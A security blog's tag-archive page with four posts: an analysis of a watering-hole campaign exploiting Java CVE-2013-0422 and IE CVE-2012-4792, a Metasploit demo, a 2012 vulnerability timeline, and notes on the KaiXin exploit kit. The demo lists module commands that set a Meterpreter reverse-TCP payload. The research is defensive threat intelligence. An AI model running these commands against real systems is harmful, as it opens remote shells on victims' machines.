Tag Archives: Oracle Java 0day

Watering Hole Campaign Use Latest Java and IE Vulnerabilities

15/01/2013Reverse EngineeringAppletHigh.jar, AppletLow.jar, APT, CFR, Council on Foreign Relations, CVE-2011-3544, CVE-2012-4792, CVE-2013-0422, DOITYOUR01.txt, DOITYOUR02.html, Internet Explorer, Internet Explorer 0day, Java, Java 0day, Java SE 6, Java SE 7, KB 2799329, logo1229.swf, Microsoft, MS13-008, Oracle, Oracle Java 0day, Reporter Sans Frontieres, Reporters Without Borders, RSF, RWB, Somethingeeeewow

Through a collaboration with (Jindrich Kubec (@Jindroush), Director of Threat Intelligence at avast! / Eric Romang (@eromang), independent security researcher), we can confirm that the watering hole campaigns are still ongoing, targeting multiple web high value web sites, including as example a major Hong Kong political party. We can also confirm that a second major Hong Kong political party is victim of this watering hole campaign.

This website is actually using the new version of the original Internet Explorer (CVE-2012-4792) vulnerability attack, patched in MS13-008, but right now it’s also using the latest Java (CVE-2013-0422) vulnerability, patched in Oracle Java 7 Update 11.

We will provide you further details on the affected web sites after their cleaning.

Chinese language version of the targeted web site is doing a remote javascript inclusion to “hxxp://www.[REDACTED].org/board/data/m/m.js“.

This website is a legitimate compromised website used for hosting the exploit files, hosted in South Korea.

This include file uses the well-known “deployJava” function, aka “deployJava.js“, and creates a cookie “Somethingeeee” with one day expiration date. This cookie is quite strange and it’s also possible to find it in years old exploits, which suggests this is only a part of greater, long-going operation.

If Internet Explorer 8 is used , an iframe is load from”hxxp://www.[REDACTED].org/board/data/m/mt.html” file. Otherwise and if Oracle Java is detected, an iframe will load “hxxp://www.[REDACTED].org/board/data/m/javamt.html“.

Analysis of “mt.html“

“mt.html” (d85e34827980b13c9244cbcab13b35ea) file is an obfuscated Javascript file which attempts to exploit the latest Internet Explorer vulnerability, CVE-2012-4792, fixed in MS13-008 and provided by Microsoft Monday morning.

https://www.virustotal.com/file/58588ce6d0a1e042450946b03fa4cd92ac1b4246cb6879a7f50a0aab2a84086a/analysis/ (avast detects this code as JS:Bogidow-A [Expl] through Script Shield component).

Comparing to the original CFR and Capstone Turbine versions, this code is not targeting certain browser supported language, but the code is based on the version used on CFR with “boy” and “girl” patterns.

Traditional “today.swf” has been replaced with “logo1229.swf” (da0287b9ebe79bee42685510ac94dc4f), “news.html” has been replaced with “DOITYOUR02.html” (cf394f4619db14d335dde12ca9657656) and “robots.txt” has been replaced with “DOITYOUR01.txt” (a1f6e988cfaa4d7a910183570cde0dc0). The traditional dropper “xsainfo.jpg” is now embedded in the “mt.html” file and obfuscated in the Javascript.

The executable file can be extracted from the string by cutting of first 13 characters, converting hex chars to binary and xoring the whole binary blob with 0xBF. Resulting file with SHA256 CE6C5D2DCF5E9BDECBF15E95943F4FFA845F8F07ED2D10FD6E544F30A9353AD2 is RAT which is communicating with a domain hosted in Hong Kong by New World Telecom.

Analysis of “javamt.html“

“javamt.html” (b32bf36160c7a3cc5bc765672f7d6f2c) is checking if Oracle Java 7 is present, if yes latest Java vulnerability, CVE-2013-0422, will be executed through “AppletHigh.jar” (521eab796271254793280746dbfd9951). If Oracle Java 6 is present, “AppletLow.jar” (2062203f0ecdaf60df34b5bdfd8eacdc) will exploit CVE-2011-3544. Both these applets contain the very same binary mentioned above (unencrypted).

Conclusion

As you see, the watering hole campaign still continues, but has evolved in form but also by using the latest Oracle Java vulnerability. There is just one advise: patch, patch, patch… and see you soon.

Java Applet JMX 0day Remote Code Execution Metasploit Demo

10/01/2013Exploits, MetasploitCVE-2013-0422, EK, Exploit Kit, Java 0day, Oracle, Oracle Java 0daywow

Timeline :

Vulnerability discovered exploited in the wild by kafeine the 2013-01-10
Metasploit PoC provided the 2013-01-10

PoC provided by :

Unknown
egypt
sinn3r
juan vazquez

Reference(s) :

CVE-2013-0422
OSVDB-89059
0 day 1.7u10 spotted in the Wild – Disable Java Plugin NOW !

Affected version(s) :

Oracle Java SE 7 Update 10 and bellow

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java SE 7 Update 10

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.

Commands :

use exploit/windows/browser/ie_cbutton_uaf
use exploit/multi/browser/java_jre17_jmxbean
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid

Year 2012 Main Exploitable Vulnerabilities Interactive Timeline

24/12/2012Vulnerability ManagementAdobe, Adobe Flash 0day, CVE-2012-0002, CVE-2012-0003, CVE-2012-0013, CVE-2012-0056, CVE-2012-0158, CVE-2012-0217, CVE-2012-0500, CVE-2012-0507, CVE-2012-0663, CVE-2012-0754, CVE-2012-0779, CVE-2012-1535, CVE-2012-1675, CVE-2012-1723, CVE-2012-1823, CVE-2012-1875, CVE-2012-1876, CVE-2012-1889, CVE-2012-2122, CVE-2012-3752, CVE-2012-4681, CVE-2012-4792, CVE-2012-4969, CVE-2012-5076, CVE-2012-5613, Flash, Flash 0day, IE 0Day, Internet Explorer 0day, Java, Java 0day, Linux, Microsoft, MySQL, Oracle, Oracle Java 0day, OSVDB-83220wow

You can find, by clicking on the following image, a visualization timeline of the main exploitable vulnerabilities of year 2012.

Start date of a slide is corresponding to:

the date of discovery of the vulnerability, or
the date of report to the vendor, or
the date of public release of the vulnerability

End date of a slide is corresponding to:

the date of vendor security alert notification, or
the date of Metasploit integration, or
the date of fix, or
the date of PoC disclosure

Year 2012 Main Exploitable Vulnerabilities Interactive Timeline

KaiXin Exploit Kit Evolutions

05/12/2012Reverse EngineeringCVE-2011-3544, CVE-2012-0507, CVE-2012-0754, CVE-2012-1723, CVE-2012-1889, CVE-2012-4681, CVE-2012-5076, EK, Exploit Kit, Java, Java 0day, KaiXin, Microsoft, Oracle, Oracle Java 0day, Reader, Reader 0daywow

Beginning August, Kahu Security discovered a new Chinese named KaiXin EK (Exploit Kit). This exploit kit was using, like his brother in blood Gong Da (Gondad) EK, javascript obfuscation “Yszz vip“.

The August version of KaiXin was supporting:

CVE-2011-3544 : An Oracle Java vulnerability fixed during October 2011 CPU.
CVE-2012-0507 : An Oracle Java vulnerability fixed during February 2012 CPU.
CVE-2012-1723 : An Oracle Java vulnerability fixed during June 2012 CPU.
CVE-2012-0754 : An Adobe Reader vulnerability fixed in APSB12-03.
CVE-2012-1889 : An Microsoft XML Core Service vulnerability fixed in MS12-043.

November version of KaiXin has involve by removing support of Oracle Java CVE-2012-0507 and CVE-2012-0754 vulnerabilities, and adding support of Oracle Java CVE-2012-1723 (fixed in Jun 2012 CPU), of Oracle Java CVE-2012-4681 (fixed in End August Oracle Security Alert) and of Oracle Java CVE-2012-5076 (fixed in October 2012 CPU).

Here under a VirusTotal analysis of all involved files:

gS19tbEF.jpg (eef74c38121c225ab4d7f1d2bbb0369a) – 9/46 : CVE-2011-3544
lXjOhqg.jpg (16e2c0a9f6636f9698e4dbe2f56551a9) – 22/46 : CVE-2012-1723
obDb9.jpg (ac8085d9ec48770511c82065d6947eb7) – 27/41 : CVE-2012-4681
MMWYD.jpg (684acb532179d99733273b79c4382b39) – 5/46 : CVE-2012-5076
WysBRr.html (f018e5adf65c0841e58ba9c69703e6d4) – 6/45 : CVE-2012-1889
JSZlR.html (7282d761c60541ad3edf7e480807bcb6) – 3/46 : CVE-2012-1889
rar.css (c11b39439a1eda6923feefcad3993d22) – 18/43 : HEUR:Trojan.Win32.Generic
top.html (13a5c097c74012a6f16fe9a866bee74e) – 2/46 : KaiXin.A

The following diagram describe you the way November version of KaiXin EK is working.

Eric Romang Blog

aka wow on ZATAZ.com